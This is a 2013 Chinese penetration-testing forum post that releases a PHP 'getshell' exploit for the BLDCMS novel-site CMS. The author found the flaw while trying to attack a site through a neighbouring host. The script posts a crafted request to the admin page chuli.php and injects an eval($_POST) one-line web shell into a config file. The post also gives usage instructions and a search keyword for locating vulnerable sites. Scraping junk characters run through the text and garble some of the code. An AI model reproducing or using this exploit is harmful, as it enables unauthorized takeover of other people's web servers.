中国网络渗透测试联盟

标题: BLDCMS(白老大小说) Getshell 0day EXP [打印本页]

作者: admin    时间: 2013-3-26 20:49
标题: BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
* o( I( P0 t+ T. X1 _- \# P6 c( f) O+ a$ x$ U0 Z% E
; F$ m8 Q; [* v6 m! o8 Y6 r) S% a
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 : u8 P; M/ N& \* c

) ?; G9 ?% @$ z2 L% G5 w4 `- h既然都有人发了 我就把我之前写好的EXP放出来吧
8 J+ y2 l/ f6 x0 E4 i0 y3 w' a% D% v4 G 4 [) n; w4 _% Y4 n
view source print?01.php;">9 F1 w- M4 c6 M, a: L1 S
02.<!--?php: i  ^* R5 q* i5 s+ r. |
03.echo "-------------------------------------------------------------------
8 R* l5 f" f4 E3 _04.
: P8 l6 `; q3 X+ d$ {0 ?4 n+ o; ~05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
5 g% Q$ c! h1 W3 t, o06. 2 I' @4 R1 U' z
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
1 S' s# X! K2 f" W08.
- O, C% p  V+ r( U9 {8 e09.QQ:981009941\r\n                                2013.3.21\r\n            
6 \5 U, w9 v9 f' w" s10.
& X: }% ?4 H/ D1 f* Z9 Y11. 6 |8 E0 w2 r% g$ k/ ~
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
4 H$ W% I! O% |# D" l; k13.
  [: i; A+ P! I14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
7 u9 R! e1 a7 M+ K9 S- D15.
4 }$ J9 T' x4 h& K6 {) |2 T16.--------------------------------------------------------------------\r\n";
% S4 _, R& D4 H% }17.$url=$argv[1];% S9 y/ V& G% M7 I
18.$dir=$argv[2];
% m5 j$ e" f9 H, A. C0 ^# Q5 ~19.$pass=$argv[3];
- M; O4 {. ?8 T9 B8 h6 r) [20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
; w. ^& e" m! F21.if (emptyempty($pass)||emptyempty($url))
  {1 ~. \( `) L0 T# x7 {22.{exit("请输入参数");}
% |7 @2 r3 `; K. ^2 J) m5 |' P23.else
% ?$ |" D0 \& z; @24.{
, u+ m+ T( T" h# p: ?25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
, \9 o. s$ {4 a# ]$ {26.
: S" Z# q, d; b+ c1 U1 d27.al;
  [1 |. C* R& J/ {28.$length = strlen($fuckdata);
$ ^- d# E) D2 \) j2 H- p29.function getshell($url,$pass)
2 @/ F2 h  T6 p7 X; d6 c9 y/ p30.{" f' }: n' J! {$ i
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
3 @; T) E" H0 e32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";; e0 B6 s; x' l) T( f4 {2 e
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
4 ?* h- [5 @. ]% J& j7 C34.$header .= "User-Agent: MSIE\r\n";$ Z& X" k" Y, i, G
35.$header .= "Host:".$url."\r\n";
0 e2 T6 B+ M0 e% H; u( I36.$header .= "Content-Length: ".$length."\r\n";) N2 k2 g$ M( R' Q4 @5 l# l
37.$header .= "Connection: Close\r\n";9 N  s: w1 i( v1 a8 A
38.$header .="\r\n";
3 f7 H  A7 Q# {6 e. p( Z5 j# E9 R39.$header .= $fuckdata."\r\n\r\n";7 @% Q0 Y8 K2 {9 C; [1 x
40.$fp = fsockopen($url, 80,$errno,$errstr,15);( Z6 s4 R/ Y0 {& ?. j
41.if (!$fp), {* l# ~8 x7 R+ n  Q6 Q
42.{
% L2 X6 Z2 g. }% @& Z; i  A43.exit ("利用失败:请检查指定目标是否能正常打开");
9 d0 t: g6 o# S( p: W& C+ h# e44.}
* W$ z/ E2 G+ U45.else{ if (!fputs($fp,$header))
2 Y# e! E/ ~' s: \: z7 b46.{exit ("利用失败");}2 h/ A5 H: N- K* ?$ n! k4 K
47.else! B; Z/ F( u4 ^' Q! s! j
48.{( f" T- F. L, c$ a) `) ^0 W) b) n
49.$receive = '';
* Y  M) u/ t; v50.while (!feof($fp)) {
' @5 F" h3 K4 L1 Z( y9 v51.$receive .= @fgets($fp, 1000);* R* ]3 D( d. c, b: y! c1 [
52.}# F) k2 a1 H$ h& K4 [) q9 Y
53.@fclose($fp);5 [& |( k% N$ m& y  z
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标
2 A, X5 Q, P- C! D( e55.
0 n! q( j/ k, B" l5 ]56.GPC是否=off)";  H3 Y+ e: Z. Y+ J+ X2 H2 v
57.}}
+ A. P' W! d1 e" a/ L& Z' r6 T* E58.}
% s. @  F6 n9 h2 @# x) z" a  M59.}) t4 U4 I5 U) A6 ^. ?
60.getshell($url,$pass);2 w5 B7 m2 |# I0 e6 A4 i2 `
61.?-->; P1 _( `% ?+ r4 I
0 r  k, j* N+ b+ ~+ j; G
# b* X! H2 @/ w2 Z/ o

* f; z) ]$ \" h5 W' U+ n( xby 数据流3 T. @) r0 B+ ?8 Q





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2